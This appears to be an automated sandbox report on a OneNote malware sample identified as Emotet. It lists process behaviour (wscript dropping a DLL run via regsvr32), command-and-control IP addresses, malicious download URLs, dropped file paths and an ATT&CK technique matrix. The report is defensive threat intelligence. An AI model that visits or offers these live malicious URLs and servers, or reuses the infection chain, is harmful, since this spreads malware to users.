                        Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exe TID: 4308Thread sleep time: -30000s >= -30000sJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exe TID: 3312Thread sleep time: -30000s >= -30000sJump to behavior
                        Source: C:\Windows\System32\regsvr32.exe TID: 2468Thread sleep time: -180000s >= -30000sJump to behavior
                        Source: C:\Windows\System32\regsvr32.exeAPI coverage: 8.0 %
                        Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                        Source: C:\Windows\System32\regsvr32.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180008D28 FindFirstFileExW,7_2_0000000180008D28
                        Source: C:\Windows\System32\regsvr32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: wscript.exe, 00000001.00000002.454449863.0000000004EB3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.450771495.0000000004FD5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.453580767.0000000004EB3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.454658429.0000000004FD5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.449938520.0000000004EB1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.449747783.0000000004EA9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.435803388.0000000004FD5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.453651451.0000000004FD5000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.617706041.00000000011B1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.586322272.000000000116D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.519602421.00000000011B1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180001C48 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_0000000180001C48
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018000A878 GetProcessHeap,7_2_000000018000A878
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180010C10 LdrFindResource_U,LdrAccessResource,NtAllocateVirtualMemory,7_2_0000000180010C10
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180001C48 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_0000000180001C48
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800082EC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_00000001800082EC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800017DC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_00000001800017DC

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 164.90.222.65 443Jump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 31.31.196.172 443Jump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 203.26.41.131 443Jump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeDomain query: penshorn.org
                        Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 66.228.32.31 7080Jump to behavior
                        Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 187.63.160.88 80Jump to behavior
                        Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 104.168.155.143 8080Jump to behavior
                        Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 91.121.146.47 8080Jump to behavior
                        Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 182.162.143.56 443Jump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeDomain query: bbvoyage.com
                        Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 167.172.199.165 8080Jump to behavior
                        Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 163.44.196.120 8080Jump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\radE00D6.tmp.dllJump to behavior
                        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800070A0 cpuid 7_2_00000001800070A0
                        Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180001D98 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,7_2_0000000180001D98

                        Stealing of Sensitive Information

                        barindex
                        Source: Yara matchFile source: Form - 16 Mar, 2023.one, type: SAMPLE
                        Source: Yara matchFile source: C:\Users\user\Desktop\Form - 16 Mar, 2023.one, type: DROPPED
                        Source: Yara matchFile source: 00000008.00000002.617622368.0000000001128000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 7.2.regsvr32.exe.c30000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.regsvr32.exe.1220000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.regsvr32.exe.1220000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 7.2.regsvr32.exe.c30000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000008.00000002.617908467.0000000001220000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000002.435040931.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.617991497.0000000002A51000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY

                        Remote Access Functionality

                        barindex
                        Source: Yara matchFile source: Form - 16 Mar, 2023.one, type: SAMPLE
                        Source: Yara matchFile source: C:\Users\user\Desktop\Form - 16 Mar, 2023.one, type: DROPPED
                        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                        Valid Accounts1
                        Scripting
                        2
                        Registry Run Keys / Startup Folder
                        111
                        Process Injection
                        21
                        Masquerading
                        OS Credential Dumping1
                        System Time Discovery
                        Remote Services1
                        Archive Collected Data
                        Exfiltration Over Other Network Medium11
                        Encrypted Channel
                        Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                        Default Accounts1
                        Exploitation for Client Execution
                        1
                        DLL Side-Loading
                        2
                        Registry Run Keys / Startup Folder
                        1
                        Virtualization/Sandbox Evasion
                        LSASS Memory121
                        Security Software Discovery
                        Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
                        Non-Standard Port
                        Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                        Domain AccountsAt (Linux)Logon Script (Windows)1
                        DLL Side-Loading
                        111
                        Process Injection
                        Security Account Manager1
                        Virtualization/Sandbox Evasion
                        SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
                        Ingress Tool Transfer
                        Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
                        Scripting
                        NTDS2
                        Process Discovery
                        Distributed Component Object ModelInput CaptureScheduled Transfer3
                        Non-Application Layer Protocol
                        SIM Card SwapCarrier Billing Fraud
                        Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                        Hidden Files and Directories
                        LSA Secrets1
                        Remote System Discovery
                        SSHKeyloggingData Transfer Size Limits114
                        Application Layer Protocol
                        Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                        Replication Through Removable MediaLaunchdRc.commonRc.common1
                        Obfuscated Files or Information
                        Cached Domain Credentials2
                        File and Directory Discovery
                        VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                        External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                        Regsvr32
                        DCSync25
                        System Information Discovery
                        Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
                        DLL Side-Loading
                        Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 828882 Sample: Form - 16 Mar, 2023.one Startdate: 17/03/2023 Architecture: WINDOWS Score: 100 40 129.232.188.93 xneeloZA South Africa 2->40 42 45.235.8.30 WIKINETTELECOMUNICACOESBR Brazil 2->42 44 38 other IPs or domains 2->44 58 Snort IDS alert for network traffic 2->58 60 Multi AV Scanner detection for domain / URL 2->60 62 Antivirus detection for URL or domain 2->62 64 7 other signatures 2->64 10 ONENOTE.EXE 50 501 2->10         started        13 ONENOTEM.EXE 2->13         started        signatures3 process4 file5 38 C:\Users\user\...\Form - 16 Mar, 2023.one, data 10->38 dropped 15 wscript.exe 2 10->15         started        20 ONENOTEM.EXE 1 10->20         started        process6 dnsIp7 52 penshorn.org 203.26.41.131, 443, 49696 DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU Australia 15->52 54 bbvoyage.com 31.31.196.172, 443, 49697 AS-REGRU Russian Federation 15->54 32 C:\Users\user\AppData\...\radE00D6.tmp.dll, PE32+ 15->32 dropped 34 C:\Users\user\AppData\Local\Temp\click.wsf, ASCII 15->34 dropped 56 System process connects to network (likely due to code injection or exploit) 15->56 22 regsvr32.exe 15->22         started        file8 signatures9 process10 process11 24 regsvr32.exe 2 22->24         started        file12 36 C:\Windows\System32\...\KGQLMqgYfV.dll (copy), PE32+ 24->36 dropped 66 Hides that the sample has been downloaded from the Internet (zone.identifier) 24->66 28 regsvr32.exe 24->28         started        signatures13 process14 dnsIp15 46 91.121.146.47, 49698, 8080 OVHFR France 28->46 48 66.228.32.31, 49700, 7080 LINODE-APLinodeLLCUS United States 28->48 50 6 other IPs or domains 28->50 68 System process connects to network (likely due to code injection or exploit) 28->68 signatures16

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand
                        SourceDetectionScannerLabelLink
                        Form - 16 Mar, 2023.one38%ReversingLabsWin32.Trojan.OneNote
                        Form - 16 Mar, 2023.one17%VirustotalBrowse
                        SourceDetectionScannerLabelLink
                        C:\Users\user\AppData\Local\Temp\radE00D6.tmp.dll58%ReversingLabsWin64.Trojan.Emotet
                        C:\Windows\System32\DWxyui\KGQLMqgYfV.dll (copy)58%ReversingLabsWin64.Trojan.Emotet
                        SourceDetectionScannerLabelLinkDownload
                        7.2.regsvr32.exe.c30000.0.unpack100%AviraHEUR/AGEN.1215476Download File
                        8.2.regsvr32.exe.1220000.0.unpack100%AviraHEUR/AGEN.1215476Download File
                        SourceDetectionScannerLabelLink
                        bbvoyage.com9%VirustotalBrowse
                        penshorn.org11%VirustotalBrowse
                        SourceDetectionScannerLabelLink
                        https://182.162.143.56/0%URL Reputationsafe
                        https://164.90.222.65/0%URL Reputationsafe
                        https://91.121.146.47:8080/kjgfzohhcvsym/ggkrpukmvfsdmfdi/y100%Avira URL Cloudmalware
                        https://104.168.155.143:8080/0%URL Reputationsafe
                        http://ozmeydan.com/cekici/9/22%VirustotalBrowse
                        http://softwareulike.com/cWIYxWMPkK/22%VirustotalBrowse
                        https://www.gomespontes.com.br/logs/pd/100%Avira URL Cloudmalware
                        https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/wM100%Avira URL Cloudmalware
                        http://softwareulike.com/cWIYxWMPkK/100%Avira URL Cloudmalware
                        http://ozmeydan.com/cekici/9/100%Avira URL Cloudmalware
                        https://104.168.155.143:8080/i100%Avira URL Cloudmalware
                        https://167.172.199.165:8080/kjgfzohhcvsym/ggkrpukmvfsdmfdi/#100%Avira URL Cloudmalware
                        https://104.168.155.143:8080/g100%Avira URL Cloudmalware
                        https://163.44.196.120:8080/kjgfzohhcvsym/ggkrpukmvfsdmfdi/100%Avira URL Cloudmalware
                        https://bbvoyage.com:443/useragreement/ElKHvb4QIQqSrh6Hqm/100%Avira URL Cloudmalware
                        https://penshorn.org/admin/Ses8712iGR8du/tM100%Avira URL Cloudmalware
                        https://penshorn.org/admin/Ses8712iGR8du/100%Avira URL Cloudmalware
                        https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/uM100%Avira URL Cloudmalware
                        https://bbvoyage.com/G0%Avira URL Cloudsafe
                        https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/R100%Avira URL Cloudmalware
                        http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/100%Avira URL Cloudmalware
                        https://164.90.222.65/0/100%Avira URL Cloudmalware
                        https://91.121.146.47:8080/kjgfzohhcvsym/ggkrpukmvfsdmfdi/dll100%Avira URL Cloudmalware
                        https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/100%Avira URL Cloudmalware
                        https://167.172.199.165:8080/kjgfzohhcvsym/ggkrpukmvfsdmfdi/100%Avira URL Cloudmalware
                        http://softwareulike.com/cWIYxWMPkK/yM100%Avira URL Cloudmalware
                        https://91.121.146.47:8080/100%Avira URL Cloudmalware
                        https://66.228.32.31:7080/kjgfzohhcvsym/ggkrpukmvfsdmfdi/100%Avira URL Cloudmalware
                        https://164.90.222.65/kjgfzohhcvsym/ggkrpukmvfsdmfdi/100%Avira URL Cloudmalware
                        https://163.44.196.120:8080/kjgfzohhcvsym/ggkrpukmvfsdmfdi/f4)100%Avira URL Cloudmalware
                        https://91.121.146.47:8080/kjgfzohhcvsym/ggkrpukmvfsdmfdi/100%Avira URL Cloudmalware
                        https://bbvoyage.com/0%Avira URL Cloudsafe
                        https://www.gomespontes.com.br/logs/pd/vM100%Avira URL Cloudmalware
                        https://163.44.196.120:8080/a100%Avira URL Cloudmalware
                        https://163.44.196.120:8080/m/Low100%Avira URL Cloudmalware
                        https://163.44.196.120:8080/c100%Avira URL Cloudmalware
                        http://ozmeydan.com/cekici/9/xM100%Avira URL Cloudmalware
                        http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/O100%Avira URL Cloudmalware
                        https://163.44.196.120:8080/h100%Avira URL Cloudmalware
                        https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/100%Avira URL Cloudmalware
                        http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/zM100%Avira URL Cloudmalware
                        https://103.44.196.120:8080/0%Avira URL Cloudsafe
                        https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/35047100%Avira URL Cloudmalware
                        https://104.168.155.143:8080/kjgfzohhcvsym/ggkrpukmvfsdmfdi/100%Avira URL Cloudmalware
                        https://penshorn.org:443/admin/Ses8712iGR8du/100%Avira URL Cloudmalware
                        https://www.gomespontes.com.br/logs/pd/ublic100%Avira URL Cloudmalware
                        NameIPActiveMaliciousAntivirus DetectionReputation
                        bbvoyage.com
                        31.31.196.172
                        truetrueunknown
                        penshorn.org
                        203.26.41.131
                        truetrueunknown
                        NameMaliciousAntivirus DetectionReputation
                        https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/true
                        • Avira URL Cloud: malware
                        unknown
                        https://164.90.222.65/kjgfzohhcvsym/ggkrpukmvfsdmfdi/true
                        • Avira URL Cloud: malware
                        unknown
                        NameSourceMaliciousAntivirus DetectionReputation
                        http://ozmeydan.com/cekici/9/wscript.exe, wscript.exe, 00000001.00000003.438065273.0000000004A4C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.446215312.0000000004D5D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.449163374.0000000004D50000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.445464334.0000000004D13000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.454128964.0000000000569000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.441367000.0000000004C39000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.437009350.0000000000519000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.453635476.0000000004F6A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.450239085.0000000004DCB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.439815100.0000000004AF2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.449599586.0000000004DCB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.439285276.0000000004B00000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.441612434.0000000004BFF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.450137005.0000000004F0D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.447642991.0000000004DCB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.449126562.0000000004D1B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.454449863.0000000004EB3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.440428219.0000000004AE9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.449909753.0000000004EE5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.442046071.0000000004CCE000.00000004.00000020.00020000.00000000.sdmpfalse
                        • 22%, Virustotal, Browse
                        • Avira URL Cloud: malware
                        unknown
                        https://104.168.155.143:8080/iregsvr32.exe, 00000008.00000002.617706041.00000000011FD000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        unknown
                        http://softwareulike.com/cWIYxWMPkK/wscript.exe, wscript.exe, 00000001.00000003.438065273.0000000004A4C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.446215312.0000000004D5D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.449163374.0000000004D50000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.445464334.0000000004D13000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.454128964.0000000000569000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.441367000.0000000004C39000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.437009350.0000000000519000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.453635476.0000000004F6A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.450239085.0000000004DCB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.439815100.0000000004AF2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.449599586.0000000004DCB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.439285276.0000000004B00000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.441612434.0000000004BFF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.450137005.0000000004F0D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.447642991.0000000004DCB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.449126562.0000000004D1B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.454449863.0000000004EB3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.440428219.0000000004AE9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.449909753.0000000004EE5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.442046071.0000000004CCE000.00000004.00000020.00020000.00000000.sdmpfalse
                        • 22%, Virustotal, Browse
                        • Avira URL Cloud: malware
                        unknown
                        https://91.121.146.47:8080/kjgfzohhcvsym/ggkrpukmvfsdmfdi/yregsvr32.exe, 00000008.00000003.519602421.00000000011A1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.521824072.00000000011A1000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: malware
                        unknown
                        https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/wMwscript.exe, 00000001.00000003.450944827.0000000004704000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        unknown
                        https://www.gomespontes.com.br/logs/pd/wscript.exe, wscript.exe, 00000001.00000003.438065273.0000000004A4C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.446215312.0000000004D5D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.449163374.0000000004D50000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.445464334.0000000004D13000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.454128964.0000000000569000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.441367000.0000000004C39000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.437009350.0000000000519000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.453635476.0000000004F6A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.450239085.0000000004DCB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.439815100.0000000004AF2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.449599586.0000000004DCB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.439285276.0000000004B00000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.441612434.0000000004BFF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.450137005.0000000004F0D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.447642991.0000000004DCB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.449126562.0000000004D1B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.454449863.0000000004EB3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.440428219.0000000004AE9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.449909753.0000000004EE5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.442046071.0000000004CCE000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        unknown
                        https://167.172.199.165:8080/kjgfzohhcvsym/ggkrpukmvfsdmfdi/#regsvr32.exe, 00000008.00000003.586761426.00000000011C0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.586322272.00000000011C0000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        unknown
                        https://104.168.155.143:8080/gregsvr32.exe, 00000008.00000002.617706041.00000000011FD000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        unknown
                        https://penshorn.org/admin/Ses8712iGR8du/tMwscript.exe, 00000001.00000003.450944827.0000000004704000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        unknown
                        https://182.162.143.56/regsvr32.exe, 00000008.00000003.586522117.00000000011FD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.617706041.00000000011FD000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://164.90.222.65/regsvr32.exe, 00000008.00000003.586522117.00000000011FD000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://163.44.196.120:8080/kjgfzohhcvsym/ggkrpukmvfsdmfdi/regsvr32.exe, 00000008.00000002.617706041.00000000011FD000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        unknown
                        https://bbvoyage.com:443/useragreement/ElKHvb4QIQqSrh6Hqm/wscript.exe, 00000001.00000002.454520022.0000000004F26000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.450137005.0000000004F0D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.450304011.0000000004F1E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.450088401.0000000004F0A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.450195483.0000000004F17000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: malware
                        unknown
                        https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/uMwscript.exe, 00000001.00000003.450944827.0000000004704000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: malware
                        unknown
                        https://penshorn.org/admin/Ses8712iGR8du/wscript.exe, 00000001.00000003.450137005.0000000004F0D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.447642991.0000000004DCB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.449126562.0000000004D1B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.454449863.0000000004EB3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.440428219.0000000004AE9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.449909753.0000000004EE5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.442046071.0000000004CCE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.439492822.0000000004A87000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.443736381.0000000004CE3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.442437886.0000000004C63000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.449180398.0000000004E02000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.453830092.0000000004E31000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.450405503.0000000004F5A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.449627322.0000000004E67000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.443042100.0000000004C48000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.440428219.0000000004B1D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.450304011.0000000004F1E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 